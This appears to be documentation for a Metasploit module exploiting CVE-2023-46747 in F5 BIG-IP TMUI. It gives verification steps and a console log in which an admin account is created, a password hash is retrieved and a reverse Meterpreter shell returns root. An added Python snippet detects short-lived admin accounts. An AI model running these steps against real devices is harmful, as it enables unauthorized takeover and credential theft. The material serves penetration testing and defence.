## Vulnerable Application

### Description

This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are
created.

Tested against the VMware OVA releases of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.
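
For defenders, the create, use and delete sequence described above leaves a recognizable trace: an administrative account that exists only briefly. The following is an added example, not part of the module or its original documentation, that flags such accounts. The event schema, field names, timestamps and the 10-minute threshold are assumptions; only the username `UyPzjB` comes from the scenario output on this page.

```python
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical normalized schema (this is NOT
# BIG-IP's native audit log format); map your own log source onto these fields.
EVENTS = [
    {"ts": "2023-11-01T09:00:00", "action": "user_create", "user": "jsmith", "role": "admin"},
    {"ts": "2023-11-01T12:00:00", "action": "user_create", "user": "tmpguest", "role": "guest"},
    {"ts": "2023-11-01T12:01:00", "action": "user_delete", "user": "tmpguest"},
    {"ts": "2023-11-01T16:35:58", "action": "user_create", "user": "UyPzjB", "role": "admin"},
    {"ts": "2023-11-01T16:36:01", "action": "command_exec", "user": "UyPzjB"},
    {"ts": "2023-11-01T16:36:05", "action": "user_delete", "user": "UyPzjB"},
    {"ts": "2023-11-03T10:00:00", "action": "user_delete", "user": "jsmith"},
]


def find_short_lived_admins(events, max_lifetime=timedelta(minutes=10)):
    """Flag admin accounts that were deleted within max_lifetime of creation."""
    created = {}   # user -> creation time of a currently existing admin account
    activity = {}  # user -> actions performed by that account while it existed
    findings = []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["ts"])):
        ts = datetime.fromisoformat(ev["ts"])
        user, action = ev["user"], ev["action"]
        if action == "user_create":
            if ev.get("role") == "admin":
                created[user] = ts
                activity[user] = []
            else:
                created.pop(user, None)  # name reused for a non-admin account
        elif action == "user_delete":
            start = created.pop(user, None)
            actions = activity.pop(user, [])
            if start is not None and ts - start <= max_lifetime:
                findings.append({
                    "user": user,
                    "created": start,
                    "lifetime_s": (ts - start).total_seconds(),
                    "actions": actions,
                })
        elif user in created:
            activity[user].append(action)  # what the account did before removal
    return findings


if __name__ == "__main__":
    for finding in find_short_lived_admins(EVENTS):
        print(finding)
```

An admin account that is created and never deleted is not reported by this check, so pair it with a periodic comparison of the current account list against an approved baseline.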

### Setup

Download `BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova` and import it into your desired virtualization software.

The target does not need to be licensed to be vulnerable.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
4. Set the `RHOST`, `PAYLOAD` and payload-related options
5. Do: `run`
6. You should get a shell.

## Targets

### Command

This executes an OS command on the target device.

## Options

## Scenarios

### F5 BIG-IP 17.0.0.1-0.0.4

```
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
RHOSTS => 192.168.159.32
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.159.32:443 - The target is vulnerable.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
[*] Sending stage (24768 bytes) to 192.168.159.32
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : f5test2.home.lan
OS           : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/var/service/restjavad
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
Credentials
===========

host            origin          service                   public  private                                                                                              realm  private_type        JtR Format    cracked_password
----            ------          -------                   ------  -------                                                                                              -----  ------------        ----------    ----------------
192.168.159.32  192.168.159.32  443/tcp (F5 BIG-IP TMUI)  admin   $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED)         Nonreplayable hash  sha512,crypt  

msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > 
```
